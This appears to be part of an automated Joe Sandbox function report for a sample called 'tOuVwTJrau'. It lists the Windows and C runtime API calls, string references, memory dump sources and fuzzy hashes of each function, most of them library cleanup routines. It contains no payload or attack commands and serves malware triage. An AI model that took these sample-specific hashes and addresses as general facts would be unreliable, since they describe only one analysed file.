PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E856A
CloseHandle.KERNEL32(?), ref: 002E8581
CloseHandle.KERNEL32(?), ref: 002E8589
CloseHandle.KERNEL32(00000000), ref: 002E8591
CloseHandle.KERNEL32(00000000), ref: 002E8599
GetLastError.KERNEL32 ref: 002E85A3

Strings

D, xrefs: 002E83BC

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
String ID: D
API String ID: 3215130363-2746444292
Opcode ID: 685674da445ccf81d7b0b2a875e590bf5670772aa4cc12eca7f5a1426546ba25
Instruction ID: e1290ac4d5923aa4012a1310f866978955c3701e5b8e1e6941cd69f9272efd6a
Opcode Fuzzy Hash: 685674da445ccf81d7b0b2a875e590bf5670772aa4cc12eca7f5a1426546ba25
Instruction Fuzzy Hash: EDA19F71951269ABEF25DF20CC46FDDB778AF04700F5041E5EA09AA1D0DB75AE84CFA0

Function 00312E53 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00312EC2
_free.LIBCMT ref: 00312ED8
_free.LIBCMT ref: 00312EEB
_free.LIBCMT ref: 00312F00
_free.LIBCMT ref: 00312F15
GetCPInfo.KERNEL32(?,?), ref: 00312F5F

Part of subcall function 0031C573: _free.LIBCMT ref: 0031C5DE

_free.LIBCMT ref: 003131CA
_free.LIBCMT ref: 003131DD
_free.LIBCMT ref: 003131EB
_free.LIBCMT ref: 003131F6
_free.LIBCMT ref: 00313238
_free.LIBCMT ref: 00313240
_free.LIBCMT ref: 00313246
_free.LIBCMT ref: 0031324E
_free.LIBCMT ref: 0031325C

Strings

P=3, xrefs: 00313287

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$Info
String ID: P=3
API String ID: 2509303402-1187372554
Opcode ID: 7ea82192193110c315a650e01958dfe0a1f6c5f38181eaa6bcef4db77c73cd9f
Instruction ID: adf9ca1fa439a966e1db31bb0b1ee4ccc92ed10f7e821cd483808fa2d0da80c1
Opcode Fuzzy Hash: 7ea82192193110c315a650e01958dfe0a1f6c5f38181eaa6bcef4db77c73cd9f
Instruction Fuzzy Hash: D7D19171D002459FDB16DFA8C881BEEBBF5FF4D310F144529E495AB242DB70A986CB60

Function 0032047F Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 003204A9
_free.LIBCMT ref: 00320582
_free.LIBCMT ref: 003205AF

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: a6455b5c1215ed96258e337412d84fc165569b87c5875aee37e91fa1b9c3f292
Instruction ID: 3b29f5053f4ea0181b6b8cbf7858b3d9d73cd51be032f5b029f959231d33e10e
Opcode Fuzzy Hash: a6455b5c1215ed96258e337412d84fc165569b87c5875aee37e91fa1b9c3f292
Instruction Fuzzy Hash: A0D10B719003259FDB2BAF78AC81AAE77E8EF45320F16416DF9409B293EB31D944CB51

Function 00320EF5 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00320F3D
_free.LIBCMT ref: 00320F61
_free.LIBCMT ref: 00320F6E
_free.LIBCMT ref: 00320F93
_free.LIBCMT ref: 00320FA0
_free.LIBCMT ref: 00320FA9
_free.LIBCMT ref: 00321283
_free.LIBCMT ref: 0032128B

Strings

@b4, xrefs: 00320F23
@b4, xrefs: 00321208

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: @b4$@b4
API String ID: 269201875-3780071977
Opcode ID: 6da6fa9f9dd445897e4c9ca30e82234eab85d4ddf646d5d2d96afba7bf0dcf10
Instruction ID: ce3d06827500d458205855e3ca296bd46f1fba2b525b8a87293e8d75fa15dc13
Opcode Fuzzy Hash: 6da6fa9f9dd445897e4c9ca30e82234eab85d4ddf646d5d2d96afba7bf0dcf10
Instruction Fuzzy Hash: 63C18472D40214BFDB25DBA8CC83FEE77F9AB49B10F550065FA04FB282D670A9809764

Function 00321AFD Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00321B41

Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E14
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E26
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E38
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E4A
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E5C
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E6E
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E80
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320E92
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EA4
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EB6
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EC8
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EDA
Part of subcall function 00320DF7: _free.LIBCMT ref: 00320EEC

_free.LIBCMT ref: 00321B36

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

_free.LIBCMT ref: 00321B58
_free.LIBCMT ref: 00321B6D
_free.LIBCMT ref: 00321B78
_free.LIBCMT ref: 00321B9A
_free.LIBCMT ref: 00321BAD
_free.LIBCMT ref: 00321BBB
_free.LIBCMT ref: 00321BC6
_free.LIBCMT ref: 00321BFE
_free.LIBCMT ref: 00321C05
_free.LIBCMT ref: 00321C22
_free.LIBCMT ref: 00321C3A

Strings

@b4, xrefs: 00321B13

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: @b4
API String ID: 161543041-4188318018
Opcode ID: 8df92338b9c38cd252ca0e2bbd9de4fdf709d8897ffc98dabcb187c7f989ce66
Instruction ID: 91d6732dc4d406a4b2d1f3c32fb51716f064486a48108a32ff40952fbbfa7ff0
Opcode Fuzzy Hash: 8df92338b9c38cd252ca0e2bbd9de4fdf709d8897ffc98dabcb187c7f989ce66
Instruction Fuzzy Hash: D7316D326003109FEB36AB38EE45F96B3EAEF65350F115829E055EB151EF30ED808724

Function 00309DEA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00348FA8,00000FA0,?,?,00309DC8), ref: 00309DF6
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00309DC8), ref: 00309E01
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00309DC8), ref: 00309E12
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00309E24
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00309E32
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00309DC8), ref: 00309E55
DeleteCriticalSection.KERNEL32(00348FA8,00000007,?,?,00309DC8), ref: 00309E71
CloseHandle.KERNEL32(00000000,?,?,00309DC8), ref: 00309E81

Strings

kernel32.dll, xrefs: 00309E0D
WakeAllConditionVariable, xrefs: 00309E2A
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00309DFC
SleepConditionVariableCS, xrefs: 00309E1E

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 3a66881445bd398df09413c9b8497fb2b70a0d894052bd8e53d6215a961125fc
Instruction ID: 9c2620a802b7f615df516dcc72874952e6ebdb387bb58b560473fcec3c58e48c
Opcode Fuzzy Hash: 3a66881445bd398df09413c9b8497fb2b70a0d894052bd8e53d6215a961125fc
Instruction Fuzzy Hash: B301BC35646301ABDB239B74BC59BAB3AADFB85B91F050816F800DA2D4DFB0CC00C660

Function 00309173 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0030919B
GetCurrentThreadId.KERNEL32 ref: 003091B8
GetCurrentThreadId.KERNEL32 ref: 003091CD
_xtime_get.LIBCPMT ref: 00309253
GetCurrentThreadId.KERNEL32 ref: 0030927D
__Xtime_diff_to_millis2.LIBCPMT ref: 00309299
_xtime_get.LIBCPMT ref: 003092BC
GetCurrentThreadId.KERNEL32 ref: 003092C6
GetCurrentThreadId.KERNEL32 ref: 003092FD

Strings

/., xrefs: 0030924D, 00309292, 003092B6, 00309252, 00309295, 003092BB
`&0, xrefs: 003091AD, 003091DF, 003092A3, 003092DD

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID: `&0$/.
API String ID: 3943753294-1576290954
Opcode ID: 512af28e5612b0276ac81c89e49595802c9b720124835ca8bb66b3b7df22dd76
Instruction ID: 2b309c5f71664c283fc0d0a2b6c90be6d2686a771fadbcf1a7ee6145f7e4dfe5
Opcode Fuzzy Hash: 512af28e5612b0276ac81c89e49595802c9b720124835ca8bb66b3b7df22dd76
Instruction Fuzzy Hash: 9B516E35A0120ADFCF12DF58C9E56A9B7BCEF09710B26895BD806AB2D6D730ED40CB50

Function 0031B91D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0031BBBE, 0031BBC3

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: d89f4b44618c507ead4e31a80b960cb56bc3d7f143682a5edd45a1495864240b
Instruction ID: e5bd69292bb3f81ae4e70499392720792a7ae4a9232bb8fc85b8fe9101bdda68
Opcode Fuzzy Hash: d89f4b44618c507ead4e31a80b960cb56bc3d7f143682a5edd45a1495864240b
Instruction Fuzzy Hash: 3AC1D170A042059FDB1BDFA8C881BEEBBB8BF4D310F154059F944AB392CB359981CB61

Function 00321314 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00321382
_free.LIBCMT ref: 0032138E
_free.LIBCMT ref: 003214B7
_free.LIBCMT ref: 003214C2

Strings

@b4, xrefs: 0032133F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free
String ID: @b4
API String ID: 269201875-4188318018
Opcode ID: ef735fe094cd636774b5a433ecde4340c71c00d5dbea582419a4adac8675a12d
Instruction ID: 9cef1d32e6d68c454fe279eec312b9784a29355c8c2d3cc96fba3897faea5d1d
Opcode Fuzzy Hash: ef735fe094cd636774b5a433ecde4340c71c00d5dbea582419a4adac8675a12d
Instruction Fuzzy Hash: 16613672900314AFDB22EF65D941FEAB7F9EF5A710F114419E949EB281EB70ED408B50

Function 0030D112 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0030D20F
type_info::operator==.LIBVCRUNTIME ref: 0030D231
___TypeMatch.LIBVCRUNTIME ref: 0030D340
IsInExceptionSpec.LIBVCRUNTIME ref: 0030D412
_UnwindNestedFrames.LIBCMT ref: 0030D496
CallUnexpected.LIBVCRUNTIME ref: 0030D4B1

Strings

csm, xrefs: 0030D1BC
csm, xrefs: 0030D14F
csm, xrefs: 0030D268

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 40deee1d6a632787d574a563a33775a7b9b7460bf641d28f7b5ac933f04b8626
Instruction ID: f6653c5064941f829808b3464e59aa5952060a2da4f8ad2b15e9956317aa3484
Opcode Fuzzy Hash: 40deee1d6a632787d574a563a33775a7b9b7460bf641d28f7b5ac933f04b8626
Instruction Fuzzy Hash: D5B1AB75802209EFCF1ADFE5C8A19AEBBF5FF04310B154569F8156B282DB30EA51CB91

Function 003170A8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 003170BE

Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE

_free.LIBCMT ref: 003170CA
_free.LIBCMT ref: 003170D5
_free.LIBCMT ref: 003170E0
_free.LIBCMT ref: 003170EB
_free.LIBCMT ref: 003170F6
_free.LIBCMT ref: 00317101
_free.LIBCMT ref: 0031710C
_free.LIBCMT ref: 00317117
_free.LIBCMT ref: 00317125

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3ebac56eecf814cc8e98bbe940c2117d3b073186149ce75a30eab6c84fbc8a34
Instruction ID: 755ca38d558c19c221c83e35942454d17f70091678e2c6750f8a09bf541e6d25
Opcode Fuzzy Hash: 3ebac56eecf814cc8e98bbe940c2117d3b073186149ce75a30eab6c84fbc8a34
Instruction Fuzzy Hash: 60219876910108AFCB46EF94CD81DDE7BB9EF88340F0151A5B515AF121EB31EA84CB94

Function 00315D60 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263

_free.LIBCMT ref: 0031604B
_free.LIBCMT ref: 00316064
_free.LIBCMT ref: 003160A2
_free.LIBCMT ref: 003160AB
_free.LIBCMT ref: 003160B7

Strings

C, xrefs: 00315EBC
O1, xrefs: 00315D79
`&0, xrefs: 00316028

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C$`&0$O1
API String ID: 3291180501-831739358
Opcode ID: 29455203d412a5619768c1ade42d486d3a8ff952c3a9a40d229319912184da11
Instruction ID: f318674e09c9cac1bf89488a7a30eaffd27aa4f640bd2ddf5f0e64fe141a6455
Opcode Fuzzy Hash: 29455203d412a5619768c1ade42d486d3a8ff952c3a9a40d229319912184da11
Instruction Fuzzy Hash: 73B15975901619DFDB2ADF18C885AE9B3B4FF4C304F5145AAE849A7290E731AED0CF50

Function 003158D5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0031FF40,00000220,?,?,?,?,?,?,0030F4C2,?), ref: 00318807

_free.LIBCMT ref: 003159E4
_free.LIBCMT ref: 003159FB
_free.LIBCMT ref: 00315A18
_free.LIBCMT ref: 00315A33
_free.LIBCMT ref: 00315A4A

Strings

lM3, xrefs: 00315928
O1, xrefs: 00315A8A, 003158DE, 00315A9F

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: _free$AllocHeap
String ID: lM3$O1
API String ID: 1835388192-4015815100
Opcode ID: 03f0fe1dbbfbb91281cf1f35676855fd0552aaae3c92588ae5ff54aba677b767
Instruction ID: 3ef69a1c1b6d6b797cce4cd2039cc558245fadedd9bb09aa3450e1a415f92330
Opcode Fuzzy Hash: 03f0fe1dbbfbb91281cf1f35676855fd0552aaae3c92588ae5ff54aba677b767
Instruction Fuzzy Hash: 6E51E571A00604DFDB2BDF69CC81AEAB7F5EF98720F150659E805DB251E731EA818B50

Function 0030CBE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0030CC17
___except_validate_context_record.LIBVCRUNTIME ref: 0030CC1F
_ValidateLocalCookies.LIBCMT ref: 0030CCA8
__IsNonwritableInCurrentImage.LIBCMT ref: 0030CCD3
_ValidateLocalCookies.LIBCMT ref: 0030CD28

Strings

csm, xrefs: 0030CCBD
`&0, xrefs: 0030CCEC

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: `&0$csm
API String ID: 1170836740-4040489779
Opcode ID: ebf92c62d0ca560d887d615ebede707dbf6af19f502408fd3c363388f1c77227
Instruction ID: 9e5751a504a602b9161f7a813ae8ad1f851fffede4afffc9cd6889958cf16710
Opcode Fuzzy Hash: ebf92c62d0ca560d887d615ebede707dbf6af19f502408fd3c363388f1c77227
Instruction Fuzzy Hash: 1941E534A112099BCF02DF68C8A1A9EBBF5EF45314F148255E819AF3D2D731A916CB91

Function 00302B60 Relevance: 12.3, APIs: 8, Instructions: 343COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00302C27
std::_Rethrow_future_exception.LIBCPMT ref: 00302C74
std::_Rethrow_future_exception.LIBCPMT ref: 00302C84
__Mtx_unlock.LIBCPMT ref: 00302D1B
__Mtx_unlock.LIBCPMT ref: 00302E14
__Mtx_unlock.LIBCPMT ref: 00302E62
__Cnd_broadcast.LIBCPMT ref: 00302EAC
__Mtx_unlock.LIBCPMT ref: 00302EB5

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
String ID:
API String ID: 3990724213-0
Opcode ID: aa77fab2eadc0b07d8ea16985306c09ea76c7649e5cbff62a4fda2afe22db6b8
Instruction ID: 680e041eb45057c0c426366d256ffd4db90d8c9de6a70eb0289b65508910db79
Opcode Fuzzy Hash: aa77fab2eadc0b07d8ea16985306c09ea76c7649e5cbff62a4fda2afe22db6b8
Instruction Fuzzy Hash: BAB11471D026099FDF26DF64C869BAFBBB4EF05300F00456EE8169B6D2DB31A904CB91

Function 00309BC6 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00309C0F
__alloca_probe_16.LIBCMT ref: 00309C3B
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00309C7A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00309C97
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00309CD6
__alloca_probe_16.LIBCMT ref: 00309CF3
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00309D35
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00309D58

Memory Dump Source

Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true

Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 6f16039ec4c43678f042e708623b7f9e291647693a11864c4d7e6b3eba302c9a
Instruction ID: 8e037233d0e3445970f66e6cd7c2534d1e5dbc575f09f2e17e2456839a4d0f9d
Opcode Fuzzy Hash: 6f16039ec4c43678f042e708623b7f9e291647693a11864c4d7e6b3eba302c9a
Instruction Fuzzy Hash: A051B07254220AABEF229FA5DC55FAB7BB9EF44750F154126F901DA1E1E730CD10CB50

Function 002F2260 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

